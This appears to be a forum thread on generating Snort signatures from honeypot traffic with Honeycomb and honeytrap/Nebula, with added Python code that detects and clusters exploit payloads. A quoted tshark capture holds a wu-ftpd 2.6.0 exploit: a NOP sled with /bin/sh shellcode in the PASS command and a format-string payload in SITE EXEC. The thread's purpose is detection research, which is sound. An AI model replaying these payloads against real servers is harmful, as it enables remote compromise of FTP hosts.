In what occasion will Honeycomb generate snort signatures ?
Well,
I've just tried capturing the packets which are sent to my honeypot host. I was using tshark to capture the packets, and I was simulating a wuftpd 2.6.0 service on my honeyd host and ran the wuftpd 2.6.0 remote exploit on the attacker's host.
This is the packet captured (http://silenceisdefeat.com/~l41n/ta/log.txt) when I was launching the exploit:
Quote:
0.000000 fe:fd:c0:a8:01:42 -> Broadcast ARP Who has 192.168.1.67? Tell 192.168.1.66
0.043489 fe:fd:c0:a8:01:43 -> fe:fd:c0:a8:01:42 ARP 192.168.1.67 is at fe:fd:c0:a8:01:43
0.000182 192.168.1.66 -> 192.168.1.137 TCP 3749 > ftp [FIN, ACK] Seq=0 Ack=0 Win=5840 Len=0
0.032176 192.168.1.137 -> 192.168.1.66 TCP ftp > 3749 [RST] Seq=0 Len=0
1.967908 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [SYN] Seq=0 Len=0 MSS=1460 TSV=206641 TSER=0 WS=1
1.970102 192.168.1.137 -> 192.168.1.66 TCP ftp > 3954 [SYN, ACK] Seq=0 Ack=1 Win=16430 Len=0 MSS=1460
1.971863 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=1 Ack=1 Win=5840 Len=0
2.071551 192.168.1.137 -> 192.168.1.66 FTP Response: 220 localhost.localdomain. FTP server (Version wu-2.6.0(5) Wed May 20 11:51:25 EDT 2009) ready.
2.072890 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=1 Ack=98 Win=5840 Len=0
2.080058 192.168.1.66 -> 192.168.1.137 FTP Request: USER ANONYMOUS
2.081984 192.168.1.137 -> 192.168.1.66 TCP ftp > 3954 [ACK] Seq=98 Ack=17 Win=16414 Len=0
2.330652 192.168.1.137 -> 192.168.1.66 FTP Response: 331 Guest login ok, send your complete e-mail address as a password.
2.334295 192.168.1.66 -> 192.168.1.137 FTP Request: PASS \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2201\300PPP\260~\315\2001\3331\300CCSKSS\260Z\315\200\353w^1\300\215^\001\210F\004fh\377\377\001SS\260\210\315\2001\300\215^\001SS\260=\315\2001\3001\333\215^\b\211C\0021\311\376\3111\300\215^\bSS\260\f\315\200\376\311u\3611\300\210F\t\215^\bSS\260=\315\200\376\016\2600\376\310\210F\0041\300\210F\a\211v\b\211F\f\211\363\215N\b\215V\fRQSS\260;\315\2001\3001\333SS\260\001\315\200\350\204\377\377\377\377\377\3770bin0sh1..11venglin
2.335162 192.168.1.137 -> 192.168.1.66 TCP ftp > 3954 [ACK] Seq=168 Ack=523 Win=15924 Len=0
2.561078 192.168.1.137 -> 192.168.1.66 FTP Response: 230-Hello User at ,
2.562235 192.168.1.137 -> 192.168.1.66 FTP Response: 230-we have 911 users (max 1800) logged in in your class at the moment.
2.563376 192.168.1.137 -> 192.168.1.66 FTP Response: 230-Local time is: Wed May 20 11:51:25 EDT 2009
2.571050 192.168.1.137 -> 192.168.1.66 FTP Response: 230-All transfers are logged. If you don't like this, disconnect now.
2.571077 192.168.1.137 -> 192.168.1.66 FTP Response: 230-
2.571088 192.168.1.137 -> 192.168.1.66 FTP Response: 230-tar-on-the-fly and gzip-on-the-fly are implemented; to get a whole
2.571099 192.168.1.137 -> 192.168.1.66 FTP Response: 230-directory "foo", "get foo.tar" or "get foo.tar.gz" may be used.
2.571111 192.168.1.137 -> 192.168.1.66 FTP Response: 230-Please use gzip-on-the-fly only if you need it; most files already
2.571122 192.168.1.137 -> 192.168.1.66 FTP Response: 230-are compressed, and I will kill your processes if you waste my
2.571133 192.168.1.137 -> 192.168.1.66 FTP Response: 230-ressour
2.571144 192.168.1.137 -> 192.168.1.66 FTP Response: ces.
2.571155 192.168.1.137 -> 192.168.1.66 FTP Response: 230-
2.571166 192.168.1.137 -> 192.168.1.66 FTP Response: 230-The command "site exec locate pattern" will create a list of all
2.571177 192.168.1.137 -> 192.168.1.66 FTP Response: 230-path names containing "pattern".
2.573032 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=523 Ack=762 Win=5840 Len=0
2.620150 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=523 Ack=800 Win=5840 Len=0
3.651774 192.168.1.137 -> 192.168.1.66 FTP Response: 230-
3.653009 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=523 Ack=854 Win=5840 Len=0
5.051493 fe:fd:c0:a8:01:43 -> fe:fd:c0:a8:01:42 ARP Who has 192.168.1.66? Tell 192.168.1.67
5.052786 fe:fd:c0:a8:01:42 -> fe:fd:c0:a8:01:43 ARP 192.168.1.66 is at fe:fd:c0:a8:01:42
5.676289 192.168.1.66 -> 192.168.1.137 FTP Request: site exec xx\274\306\277\277%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%d%c%c%.f|%p
5.677273 192.168.1.137 -> 192.168.1.66 TCP ftp > 3954 [ACK] Seq=854 Ack=949 Win=16004 Len=0
5.791002 192.168.1.137 -> 192.168.1.66 FTP Response: 500 'site': command not understood.
5.792187 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=949 Ack=891 Win=5840 Len=0
If compared to the captured packet of the wuftpd 2.6.0 exploit which I found on http://www.inguardians.com/research/docs/sigs.pdf, it looks similar (but I still want to know your opinion about it):
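As an added illustration (not code from the original post, nor from Honeycomb, honeyd or Nebula), here is a small Python script that decodes tshark's escaped rendering of the two client commands in the capture above and measures the two things a hand-written rule for this exploit keys on: the length of the 0x90 (NOP) run in the PASS argument, and the number of printf-style conversions in the SITE EXEC argument. The sample lines are a shortened, constructed imitation of the capture, and the summary-line regex and the two thresholds are assumptions.

```python
"""Decode tshark's escaped FTP payload text and flag the two stages of the
wu-ftpd 2.6.0 exploit seen in the capture: a NOP sled plus shellcode in the
PASS argument, then a format string in SITE EXEC.  Added example only."""
import re

# Constructed excerpt modelled on the tshark summary lines in the post; the
# sled and the run of conversions are shortened so the sample stays readable.
SAMPLE_LINES = [
    "2.080058 192.168.1.66 -> 192.168.1.137 FTP Request: USER ANONYMOUS",
    "2.334295 192.168.1.66 -> 192.168.1.137 FTP Request: PASS "
    + "\\220" * 40 + "\\2201\\300PPP\\260~\\315\\2001\\3331\\300CCSKSS\\260Z\\315\\200",
    "5.676289 192.168.1.66 -> 192.168.1.137 FTP Request: site exec xx\\274\\306\\277\\277"
    + "%.f" * 30 + "%d%c%c%.f|%p",
    "5.791002 192.168.1.137 -> 192.168.1.66 FTP Response: 500 'site': command not understood.",
]

# Assumed layout of a tshark summary line for an FTP command or reply.
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+) -> (?P<dst>\S+)\s+FTP (?P<dir>Request|Response): (?P<text>.*)$"
)
# tshark prints non-printable bytes as three-digit octal (\220) or as C escapes (\b, \t, \f, \a).
ESC_RE = re.compile(r"\\([0-7]{3})|\\([abfnrtv\\])")
C_ESC = {"a": 7, "b": 8, "f": 12, "n": 10, "r": 13, "t": 9, "v": 11, "\\": 92}
NOP = 0x90
# printf conversion: % flags width [.precision] conversion character
FMT_RE = re.compile(rb"%[-+ #0]*\d*(?:\.\d*)?[diouxXeEfgGcspn]")


def decode_tshark_escapes(text: str) -> bytes:
    """Turn tshark's printable rendering back into the raw payload bytes."""
    out = bytearray()
    i = 0
    while i < len(text):
        m = ESC_RE.match(text, i)
        if m:
            out.append(int(m.group(1), 8) if m.group(1) else C_ESC[m.group(2)])
            i = m.end()
        else:
            out += text[i].encode("latin-1", "replace")
            i += 1
    return bytes(out)


def longest_nop_run(payload: bytes) -> int:
    """Length of the longest run of 0x90 (i386 NOP) bytes: the sled."""
    best = cur = 0
    for b in payload:
        cur = cur + 1 if b == NOP else 0
        best = max(best, cur)
    return best


def format_specifier_count(payload: bytes) -> int:
    """Number of printf-style conversions in attacker-controlled text."""
    return len(FMT_RE.findall(payload))


def analyse(lines, nop_threshold=16, fmt_threshold=8):
    """One finding per client FTP command that looks like an exploit stage.
    Thresholds are assumptions: a legitimate password or SITE argument has
    no sled and at most a stray percent sign."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group("dir") != "Request":
            continue
        cmd, _, arg = m.group("text").partition(" ")
        payload = decode_tshark_escapes(arg)
        if cmd.upper() == "PASS":
            run = longest_nop_run(payload)
            if run >= nop_threshold:
                findings.append({"cmd": "PASS", "kind": "nop_sled", "value": run,
                                 "src": m.group("src"), "dst": m.group("dst")})
        elif cmd.upper() == "SITE" and arg.upper().startswith("EXEC"):
            n = format_specifier_count(payload)
            if n >= fmt_threshold:
                findings.append({"cmd": "SITE EXEC", "kind": "format_string", "value": n,
                                 "src": m.group("src"), "dst": m.group("dst")})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LINES):
        print("%(src)s -> %(dst)s %(cmd)s: %(kind)s (%(value)d)" % f)
```

To run it on the real log, feed the tshark summary lines from the saved file into analyse() instead of SAMPLE_LINES. The two measurements are also the anchors a rule for this exploit would carry: a PASS argument containing a long run of |90| bytes, and a SITE EXEC argument containing many %.f conversions, which is what the sigs.pdf capture has in common with yours.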
Hmm, no comments on your approach except with known exploits I'd strongly suggest using known signatures for checking. I mean that's way easier, isn't it? And maybe it would be an idea to research other automagical rule generation efforts? For instance Honeytrap with the Nebula plugin might be interesting once you get the source to work.
Nebula is at Sourceforge and Honeytrap at SVN at carnivore.it. Basically you just build Honeytrap --with-plugin-nebula (or like that), configure the plugin in honeytrap.conf and build Nebula.
Successfully installed both honeytrap and Nebula. Successfully loaded the Nebula plugin from honeytrap, but still got no snort signatures generated.
Have you tried them out?
-c = a percentage (0 to 100) of similarity that must be met by the data to be put in a cluster. The similarity gives you control over how strict you want to be when clustering data.
-t = tells nebula when it should start creating a signature. The idea here is that you don't want signatures that are based on a small amount of source data. Higher amounts of source data produce better signatures.
Then start testing by executing some exploits against the honeytrap host; you should then see signatures being generated.
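To make the two knobs concrete, here is an added toy in Python (not Nebula's code or its actual algorithm) that does threshold-driven signature generation the way the two options are described above: payloads are grouped when their similarity is at least -c percent, a rule is emitted only once a group holds at least -t samples, and the rule's content matches are the byte strings every member of the group shares. difflib.SequenceMatcher stands in for the real similarity metric, the greedy grouping is a simplification, the payloads are constructed (three sleds reusing the first shellcode bytes from the capture in this thread, plus two ordinary FTP commands), and the sid range is a local one.

```python
"""Toy threshold-driven signature generation, illustrating nebula's -c
(minimum similarity to join a cluster) and -t (minimum cluster size before
a signature is produced).  Not Nebula's code or its algorithm."""
from difflib import SequenceMatcher

# The first bytes of the shellcode that followed the NOP sled in the capture
# quoted in this thread: xor eax,eax / push eax x3 / mov al,0x7e / int 0x80.
SHELLCODE_STUB = b"1\xc0PPP\xb0~\xcd\x80"

# Constructed payloads, not captured traffic: three PASS sleds with different
# sled lengths and trailing padding, plus two ordinary FTP commands.
SAMPLES = [
    b"PASS " + b"\x90" * 40 + SHELLCODE_STUB + b"A" * 8,
    b"PASS " + b"\x90" * 36 + SHELLCODE_STUB + b"B" * 12,
    b"PASS " + b"\x90" * 44 + SHELLCODE_STUB + b"C" * 4,
    b"PASS joe@example.com\r\n",
    b"RETR README.txt\r\n",
]


def similarity(a: bytes, b: bytes) -> int:
    """Percent similarity on the 0..100 scale that -c uses; difflib's
    ratio stands in for the real metric."""
    return int(round(SequenceMatcher(None, a, b).ratio() * 100))


def cluster(samples, c):
    """Greedy clustering: a sample joins the first cluster whose
    representative (its first member) is at least c percent similar,
    otherwise it starts a new cluster."""
    clusters = []
    for s in samples:
        for members in clusters:
            if similarity(members[0], s) >= c:
                members.append(s)
                break
        else:
            clusters.append([s])
    return clusters


def common_contents(members, min_len=4):
    """Byte strings shared by every member: the matching blocks of the
    first two members, kept only if they also occur in all the others."""
    if len(members) < 2:
        return [members[0]]
    blocks = SequenceMatcher(None, members[0], members[1]).get_matching_blocks()
    candidates = [members[0][m.a:m.a + m.size] for m in blocks if m.size >= min_len]
    return [c for c in candidates if all(c in other for other in members[2:])]


def to_snort_rule(contents, sid):
    """Render the shared byte strings as ordered Snort content matches
    (sid in the local 1000000+ range)."""
    matches = "; ".join(
        'content:"|%s|"' % " ".join("%02x" % b for b in c) for c in contents)
    return ('alert tcp any any -> $HOME_NET 21 (msg:"auto-generated sig %d"; '
            'flow:to_server,established; %s; sid:%d; rev:1;)' % (sid, matches, sid))


def generate_signatures(samples, c=75, t=3, base_sid=1000000):
    """One rule per cluster that reached t members (the -t gate); smaller
    clusters are evidence that is still too thin to turn into a rule."""
    rules = []
    for i, members in enumerate(cluster(samples, c)):
        if len(members) < t:
            continue
        contents = common_contents(members)
        if contents:
            rules.append(to_snort_rule(contents, base_sid + i))
    return rules


if __name__ == "__main__":
    for c, t in ((75, 3), (75, 4), (90, 3)):
        print("-c %d -t %d -> %d rule(s)" % (c, t, len(generate_signatures(SAMPLES, c, t))))
    for rule in generate_signatures(SAMPLES, 75, 3):
        print(rule)
```

With -c 75 and -t 3 the three sleds land in one cluster and yield a single rule whose content matches are "PASS " and the shared sled-plus-stub bytes; raising -t to 4 suppresses it because the cluster is too small, and raising -c to 90 splits the sleds into singletons because their sled lengths differ. That is the trade-off the post describes: low values get you a quick signature from little evidence, higher values get a rule only once enough similar samples have arrived.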
Thanks for posting. Two questions if I may. Why did you choose nfq in --with-stream-mon= over pcap? And can you say anything wrt the "quality" of the sigs? Does it come close to your original objective?
You should set the values of -t and -c higher to get better sigs. I was using lower values just to make sure the plugin works (and to get some quick sigs). Since I'm not familiar with snort sigs yet, I can't say whether it's close to the objective or not.
Well, in fact you can use either pcap or nfq; since I only had netfilter_queue installed on my host I decided to use it as a test.
Thanks